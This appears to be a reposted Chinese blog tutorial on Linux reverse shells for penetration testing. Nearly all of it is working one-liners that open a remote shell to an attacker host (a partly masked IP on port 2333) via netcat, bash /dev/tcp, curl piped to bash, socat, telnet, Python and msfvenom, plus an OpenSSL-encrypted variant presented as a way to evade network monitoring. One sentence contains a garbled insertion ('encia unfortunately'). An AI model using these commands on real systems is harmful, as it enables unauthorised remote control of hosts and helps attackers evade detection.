本文共 1835 字,大约阅读时间需要 6 分钟。
渗透测试中,Linux系统的反弹shell操作无疑是一个经典且重要的情景。攻击者通过在目标机上建立一个向攻击机转发的反弹通道,能够模拟一个虚拟终端,从而获得对目标系统的远程控制权限。
反弹shell的核心作用在于克服传统正向连接的局限性。例如,当目标机防火墙严格控制出口访问,端口资源受限,或主机位于动态IP环境中时,正向连接往往难以实现。而反弹shell则通过将攻击机指定为服务端,依赖目标机的主动连接,成为突破这些限制的有效武器。
反弹shell的具体实现多种多样,常见方式包括:
Netcat(nc)是一款强大的网络测试工具,广泛用于反弹shell。尽管部分发行版限制了其encia unfortunately(-e)参数,攻击者仍可通过手动安装特定版本来利用Netcat反弹shell。
命令示例:
nc -lvvp 2333
攻击机开启监听,目标机执行:
nc 47.xxx.xxx.72 2333 -e /bin/bash
Bash可通过标准输入结合重定向实现反弹shell,命令如下:
bash -i > /dev/tcp/47.xxx.xxx.72/2333 0>&1
借助curl命令,可将反弹shell命令触发为目标机执行:
curl 47.xxx.xxx.72 | bash
Socat是一款功能强大的网络工具,用于创建和管理网络连接,反弹shell的实现较为简便。
命令示例:
socat TCP-LISTEN:2333 -
攻击机监听,目标机执行:
socat tcp-connect:47.xxx.xxx.72:2333 exec:/bin/bash
在支持Telnet的目标机上,可通过Telnet客户端实现反弹shell。
命令示例(目标机执行):
telnet 47.xxx.xxx.72 2333 | /bin/bash
针对目标机具备相应脚本环境,可借助Python、PHP、Perl等语言实现反弹shell。以下是Python示例:
python -c "import socket,os; s=socket.socket(socket.AF_INET, socket.SOCK_STREAM); s.connect(('47.xxx.xxx.72', 2333)); os.dup2(s.fileno(), 0); os.dup2(s.fileno(), 1); os.dup2(s.fileno(), 2); import sys; sys.stdin = s.makefile(1); sys.stdout = s.makefile(1); import pty; pty.spawn(['/bin/bash'])"
Metasploit框架提供了生成一句话反弹shell的强大功能。如需生成特定语言反弹shell可执行:
msfvenom -l | grep cmd/unix/reverse
目标机执行生成的payload即可实现反弹shell。
传统反弹shell的通信流量为明文,易被网络防护设备发现。使用OpenSSL,攻击者可在反弹过程中加入加密层,克服这一限制。
openssl req -x509 -newkey rsa:2048 -keyout key.pem -out cert.pem -days 365 -nodes
openssl s_server -quiet -key key.pem -cert cert.pem -port 2333
mkfifo /tmp/s; /bin/sh -i < /tmp/s 2>&1 | openssl s_client -quiet -connect 47.xxx.xxx.72:2333 > /tmp/s; rm /tmp/s
通过以上方法,攻击者可根据目标环境选择最适合的手段,成功实现反弹shell,获取目标系统的控制权限。
转载地址:http://hutez.baihongyu.com/